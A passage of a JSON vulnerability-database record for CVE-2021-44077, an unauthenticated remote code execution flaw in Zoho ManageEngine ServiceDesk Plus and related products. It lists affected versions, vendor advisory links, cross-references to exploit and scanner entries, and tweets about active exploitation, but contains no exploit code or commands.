"zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.1"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.1"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.1"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.1"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.1"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.1"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.1"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.1"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.2"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.2"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.2"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.2"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.2"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.2"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.2"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.2"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.2"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.2"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.2"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.2"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10520:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10519:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10522:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11011:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11139:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10505:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11144:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11005:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11208:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11301:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10501:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11008:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "10.5", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10523:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11009:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10507:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10500:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10512:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11305:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10511:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10517:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11302:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11006:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10526:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10510:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10515:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11013:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11142:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10524:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11203:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11003:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10503:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11209:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11140:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11207:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11304:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11200:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11141:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11303:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11000:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11143:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11204:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11205:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10525:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10528:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10521:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11211:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11300:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10508:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11012:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11007:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11004:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10502:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10509:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11202:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11145:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11201:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10527:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11206:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10529:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10513:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10516:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10506:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11210:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10514:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11002:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11001:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11138:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10504:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11010:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10518:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021", "refsource": "MISC", "tags": ["Vendor Advisory"], "url": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021"}, {"name": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-msp-versions-10527-till-10529", "refsource": "MISC", "tags": ["Vendor Advisory"], "url": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-msp-versions-10527-till-10529"}, {"name": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-supportcenter-plus-versions-11012-and-11013", "refsource": "MISC", "tags": ["Vendor Advisory"], "url": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-supportcenter-plus-versions-11012-and-11013"}, {"name": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above"}]}, "lastseen": "2021-12-08T08:36:26", "differentElements": ["extraReferences", "modified", "references"], "edition": 4}], "viewCount": 113, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:72CD807D-E26D-4F68-8717-436863B7F8B1"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/MANAGEENGINE_SERVICEDESK_PLUS_CVE_2021_44077/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0920"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:45C740B931E148E6075FD00036A389CB", "RAPID7BLOG:104BCB9FE21AA540C50BD81151F701D5"]}, {"type": "cisa", "idList": ["CISA:72D01121CAFBC56638BC974ABA539CF8", "CISA:DD18BE6DC961451834F7597A6E8AAE45"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165400"]}, {"type": "zdt", "idList": ["1337DAY-ID-37167"]}, {"type": "githubexploit", "idList": ["1A95BB02-1B5A-5BC5-9B6B-61483A1C1100"]}, {"type": "threatpost", "idList": ["THREATPOST:81CC7A43B010B785FD5977FBA1043E11", "THREATPOST:927CAECDA58E6BC3266D14FE340589BB"]}, {"type": "nessus", "idList": ["MANAGEENGINE_SERVICEDESK_11_3_BUILD11306.NASL"]}, {"type": "thn", "idList": ["THN:60B42277F576BB78A640A9D3B976D8D8", "THN:A29E47C7A7467A109B420FF0819814EE", "THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-28T21:26:09", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:72CD807D-E26D-4F68-8717-436863B7F8B1"]}, {"type": "cisa", "idList": ["CISA:DD18BE6DC961451834F7597A6E8AAE45"]}], "modified": "2021-12-28T21:26:09"}, "score": {"value": 4.4, "vector": "NONE", "modified": "2021-12-28T21:26:09", "rev": 2}, "twitter": {"counter": 34, "tweets": [{"link": "https://twitter.com/hernanespinoza/status/1468140357674229772", "text": " Have you reviewed /CISAgov and /FBI\u2019s latest released on active /hashtag/APT?src=hashtag_click exploitation of CVE-2021-44077 in Zoho ManageEngine ServiceDesk Plus? Review https://t.co/wQZUywIOEB and immediately patch your /hashtag/software?src=hashtag_click to prevent exploitation. \n/hashtag/Cybersecurity?src=hashtag_click /hashtag/In?src=hashtag_click\u2026"}, {"link": "https://twitter.com/CyberSecDN/status/1467442698822946816", "text": "Determined APT is exploiting ManageEngine ServiceDesk Plus vulnerability (CVE-2021-44077) https://t.co/ZCmTGRi95A /hashtag/IT_securitynews?src=hashtag_click"}, {"link": "https://twitter.com/drwareinc/status/1467546845756932103", "text": "APT Actors Exploiting CVE-2021-44077 in Zoho ManageEngine ServiceDesk\u00a0Plus"}, {"link": "https://twitter.com/Attackerkb_Bot/status/1468667547851829248", "text": "A new /hashtag/attackerkb?src=hashtag_click assesment on 'CVE-2021-44077' has been created by wvu-r7.\nAttacker Value: 5 | Exploitability: 5"}, {"link": "https://twitter.com/Horizon3Attack/status/1468690754964967430", "text": "Another day, another Zoho RCE.\n\nCVE-2021-44077 for /hashtag/ManageEngine?src=hashtag_click ServiceDesk Plus\n\n* PoC: https://t.co/vMKGLAwCwy\n* Research Credit: https://t.co/c95Rmcl0VB"}, {"link": "https://twitter.com/hernanespinoza/status/1468875289338040320", "text": "AA21-336A: APT Actors Exploiting CVE-2021-44077 in Zoho ManageEngine ServiceDesk Plus https://t.co/A85xyBA5SS"}, {"link": "https://twitter.com/buaqbot/status/1468926008317431815", "text": "Exploit for ['CVE-2021-44077'] exploit\n https://t.co/lgiZYbhMRu\nhttps://t.co/zPSS6MArnY"}, {"link": "https://twitter.com/_sSUb__/status/1469109434995847168", "text": "CVE-2021-44077 : PreAuth RCE in ManageEngine ServiceDesk Plus"}, {"link": "https://twitter.com/hack_git/status/1469556617800822785", "text": "CVE-2021-44228: Apache <2.15.0 /hashtag/Log4j?src=hashtag_click RCE\nhttps://t.co/g55CXQndgX\n\nLog4Shell: RCE 0-day exploit found in log4j2,a popular Java logging package\nhttps://t.co/b60NjeJoB1\n\nPoC Exploit for ManageEngine ServiceDesk Plus (CVE-2021-44077)\n\u2026 https://t.co/jvcAALA00t", "author": "hack_git", "author_photo": "https://pbs.twimg.com/profile_images/1430451138277556224/yDiqSjga_400x400.jpg"}, {"link": "https://twitter.com/cKure7/status/1471171643666055173", "text": "\u25a0\u25a0\u25a0\u25a0\u25a1 Proof of Concept Exploit for ManageEngine ServiceDesk Plus CVE-2021-44077.", "author": "cKure7", "author_photo": "https://pbs.twimg.com/profile_images/1253998211733360641/YjAE3DV9_400x400.jpg"}], "modified": "2021-12-08T08:36:26"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_servicedesk_plus_msp:10.5", "cpe:/a:zohocorp:manageengine_supportcenter_plus:11.0", "cpe:/a:zohocorp:manageengine_servicedesk_plus:11.2", "cpe:/a:zohocorp:manageengine_servicedesk_plus:11.1", "cpe:/a:zohocorp:manageengine_servicedesk_plus:11.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11304:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11204:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10522:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10512:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10514:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11009:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10502:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10518:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11202:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11008:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10513:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11205:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11301:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10517:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11139:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10525:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11211:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10516:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11145:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10506:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11300:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11001:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11142:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10528:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10509:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10500:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11144:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10505:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11200:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10524:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11210:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10507:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10511:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11004:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11138:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10501:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10515:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11013:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11305:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10523:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10503:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10520:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11140:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10529:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10510:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11007:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11209:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10504:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11006:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11011:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11141:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11201:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11303:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11203:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11010:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11012:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11005:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11206:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10527:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11208:*:*:*:*:*:*", 